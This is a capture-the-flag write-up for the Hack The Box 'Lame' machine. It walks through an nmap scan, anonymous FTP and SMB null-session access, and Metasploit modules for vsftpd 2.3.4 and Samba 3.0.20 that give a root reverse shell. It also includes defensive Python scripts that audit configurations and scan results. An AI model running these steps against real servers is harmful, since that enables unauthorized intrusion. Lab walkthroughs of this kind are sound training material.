Lame writeup HTB

Lame

An easy box that relies on known public exploits, while introducing important protocols such as FTP and SMB.

Discovery

Using nmap, we can scan the target for open ports, which gives us possible vectors of attack. The command used:

nmap -sV -sC -T4 <IP>

We are able to see a few open ports we can try to attack:

File Transfer Protocol

FTP is an old Internet protocol for transferring files between computers on a network: a client connects to a server and can download (or upload) files. Since the FTP port (21) is open, let's see if it allows anonymous access (meaning anyone can log in and access the files without a real account):

[ftp <IP>] followed by typing Anonymous as the username and leaving the password empty.

It does! However, it turns out there are no files present for us to view. Let's move on to some of the other open ports, like 139 or 445.


Server Message Block

SMB, like FTP, is a communication protocol. It lets computers read and modify files on a server that is accessed remotely. These files are grouped in folders called shares. Again, let's see if we can connect to the server to potentially uncover some sensitive information. First, let's enumerate the shares available for us to potentially access.

smbclient -L <IP> -N

Where -L tells the tool to list the available shares and -N suppresses the password prompt (a null session, i.e. no credentials at all).

Two shares pique my interest: the one called tmp and the one called opt. Now let's try to connect to a share, still using the smbclient tool:

smbclient \\\\<IP>\\tmp   or   smbclient \\\\<IP>\\opt

We have access to both of these! But just like the ftp server, it doesn’t look like there are any juicy files for us. No worries. Let’s go back to the nmap scan we performed earlier.
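The two findings above (anonymous FTP login and shares that open with a null session) are both configuration issues on the server side. As an added example, not part of the original writeup and not taken from the Lame box itself, here is a small Python audit that parses constructed vsftpd.conf and smb.conf fragments and flags the weak settings next to their hardened counterparts. The directive names (anonymous_enable, anon_upload_enable, write_enable, map to guest, guest ok, public, writable) are the real vsftpd and Samba parameters; the file contents are constructed samples and the upstream defaults are assumed from vsftpd.conf(5) and smb.conf(5).

```python
import configparser
from typing import Dict, List

# Constructed vsftpd.conf fragments: the weak file allows the anonymous login
# the writeup uses; the hardened one disables it.
WEAK_VSFTPD = """# constructed sample
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
"""
HARDENED_VSFTPD = """# constructed sample
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
"""

# Constructed smb.conf fragments: guest-accessible shares (reachable with
# smbclient -N) versus shares that require an authenticated user.
WEAK_SMB = """[global]
workgroup = WORKGROUP
map to guest = Bad User
[tmp]
path = /tmp
guest ok = yes
writable = yes
[opt]
path = /opt
public = yes
"""
HARDENED_SMB = """[global]
workgroup = WORKGROUP
map to guest = Never
[tmp]
path = /tmp
guest ok = no
valid users = @staff
"""


def truthy(value: str) -> bool:
    """Both daemons accept yes/true/1 (case-insensitive) as boolean true."""
    return value.strip().lower() in ("yes", "true", "1")


def parse_vsftpd(text: str) -> Dict[str, str]:
    """vsftpd.conf is one key=value per line; '#' starts a comment."""
    conf: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def audit_vsftpd(text: str) -> List[str]:
    """Flag anonymous access. Assumed upstream defaults (vsftpd.conf(5)):
    anonymous_enable=YES, write_enable=NO, anon_upload_enable=NO."""
    conf = parse_vsftpd(text)
    issues = []
    if truthy(conf.get("anonymous_enable", "YES")):
        issues.append("anonymous_enable=YES: anonymous FTP login is allowed")
        if truthy(conf.get("write_enable", "NO")) and truthy(conf.get("anon_upload_enable", "NO")):
            issues.append("anon_upload_enable=YES: anonymous users can upload files")
    return issues


def audit_smb(text: str) -> List[str]:
    """Flag guest-mapped logins and shares any null session can open.
    smb.conf is INI-like, so configparser handles it (keys are lower-cased)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    issues = []
    glob = cp["global"] if cp.has_section("global") else {}
    map_guest = glob.get("map to guest", "never")
    if map_guest.strip().lower() != "never":
        issues.append(f"map to guest = {map_guest}: failed logins are mapped to the guest account")
    for share in cp.sections():
        if share == "global":
            continue
        sec = cp[share]
        # 'public' is a Samba synonym for 'guest ok'
        if truthy(sec.get("guest ok", "no")) or truthy(sec.get("public", "no")):
            mode = "writable" if truthy(sec.get("writable", sec.get("writeable", "no"))) else "read-only"
            issues.append(f"share [{share}] is guest-accessible ({mode}); a null session can open it")
    return issues


if __name__ == "__main__":
    for name, fn, weak, hard in (("vsftpd", audit_vsftpd, WEAK_VSFTPD, HARDENED_VSFTPD),
                                  ("smb", audit_smb, WEAK_SMB, HARDENED_SMB)):
        print(f"{name} weak:     {fn(weak)}")
        print(f"{name} hardened: {fn(hard)}")
```

Running the block prints the issues found in the weak fragments and an empty list for the hardened ones, which is the check an administrator would want before a box like this is reachable by anyone with smbclient -N or an anonymous FTP client.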

Shell as root

Returning to the nmap scan, it's important to note the version of each service offered, because a known exploit for that exact version may already exist.

Sure enough, a quick Google search on both of them reveals that serious exploits for these versions have already been discovered:

https://www.exploit-db.com/exploits/49757 –> for the ftp server

https://www.exploit-db.com/exploits/16320 –> for the smb server
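The step above, matching service banners against versions with public exploits, is also what a defender does with the same scan to decide what must be patched first. As an added example, not part of the original writeup, here is a Python parser for nmap's grepable output (-oG) that pulls out each open port's version banner and flags the two versions named on this page against the Exploit-DB references given above. The scan text is a constructed sample that mimics the Lame services; the banner layout (port/state/proto/owner/service/rpcinfo/version/) is nmap's grepable field order, and the product/version split is a best-effort assumption on free-form banners.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed `nmap -sV -oG` output for a host with the same services as Lame.
# Each port entry is port/state/proto/owner/service/rpcinfo/version/ and
# entries are separated by ", ".
SAMPLE_GREPABLE = """# Nmap 7.94 scan initiated (constructed sample)
Host: 10.10.10.3 ()\tStatus: Up
Host: 10.10.10.3 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, 445/open/tcp//netbios-ssn//Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)/\tIgnored State: closed (996)
# Nmap done (constructed sample) -- 1 IP address (1 host up) scanned
"""

# (product, version) pairs the writeup identifies as having public exploits,
# mapped to the Exploit-DB references it cites.
KNOWN_VULNERABLE: Dict[Tuple[str, str], str] = {
    ("vsftpd", "2.3.4"): "https://www.exploit-db.com/exploits/49757",
    ("samba", "3.0.20"): "https://www.exploit-db.com/exploits/16320",
}

# First dotted numeric version in a banner, e.g. "2.3.4" or "4.7" from "4.7p1"
VERSION_RE = re.compile(r"\d+(?:\.\d+)+")


def parse_grepable(text: str) -> List[dict]:
    """Return one dict per open port found in nmap grepable output."""
    results = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        host = line.split()[1]
        # Fields after the host are tab-separated: "Ports: ...", "Ignored State: ..."
        for field in line.split("\t")[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(", "):
                # maxsplit=6 keeps any '/' inside the free-form version banner
                parts = entry.strip().rstrip("/").split("/", 6)
                if len(parts) < 7:
                    continue
                port, state, proto, _owner, service, _rpc, version = parts
                if state != "open":
                    continue
                results.append({"host": host, "port": int(port), "proto": proto,
                                "service": service, "version": version})
    return results


def extract_product_version(banner: str) -> Optional[Tuple[str, str]]:
    """Best-effort split of a banner into (product, version); product is the
    first word before the version number, lower-cased. Returns None when the
    banner carries no concrete version (e.g. 'Samba smbd 3.X - 4.X')."""
    match = VERSION_RE.search(banner)
    if not match:
        return None
    prefix_words = banner[:match.start()].split()
    product = prefix_words[0].lower() if prefix_words else ""
    return product, match.group(0)


def flag_known_vulnerable(ports: List[dict]) -> List[dict]:
    """Attach a reference to every open port whose banner matches KNOWN_VULNERABLE."""
    findings = []
    for port in ports:
        pv = extract_product_version(port["version"])
        if pv and pv in KNOWN_VULNERABLE:
            findings.append({**port, "product": pv[0], "product_version": pv[1],
                             "reference": KNOWN_VULNERABLE[pv]})
    return findings


def audit(text: str = SAMPLE_GREPABLE) -> List[dict]:
    """Parse a grepable scan and return the ports that need patching first."""
    return flag_known_vulnerable(parse_grepable(text))


if __name__ == "__main__":
    for finding in audit():
        print(f"{finding['host']}:{finding['port']} {finding['version']!r} -> {finding['reference']}")
```

Ports 21 and 445 come back flagged with their references, port 22 is parsed but not matched (its version is not in the table), and port 139 is skipped because its banner has no concrete version. Extending KNOWN_VULNERABLE with an organisation's own list turns the same parser into a simple inventory check over real scan output.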

Great! All the work has already been done for us. All we need to do now is run one of the exploits and provide it with the information it needs to complete. Alternatively, we could use Metasploit, a penetration testing framework backed by a huge database of known exploits, to do the work for us. Let's use the smb exploit as an example.

msfconsole –> starting metasploit

search vsftpd 2.3.4   or   search samba 3.0.20 –> search the database for the exploit needed, then select it with use <exploitnumber>

show options –> shows the options we need to fill in to complete the exploit.

set rhosts <IP> –> so the module knows which server to attack

set lhost <YOURIP> –> your own address for the reverse connection (type ifconfig tun0 to find it)

exploit   or   run –> runs the exploit!

Running the exploit gives us a shell! But not just any type of shell. A root shell! This means we are now connected to the server with full privileges, so we can do pretty much whatever we want. Since this is a CTF challenge, I’ll go look for both flags. The user flag is in one of the user home directories while the other one resides in the /root directory.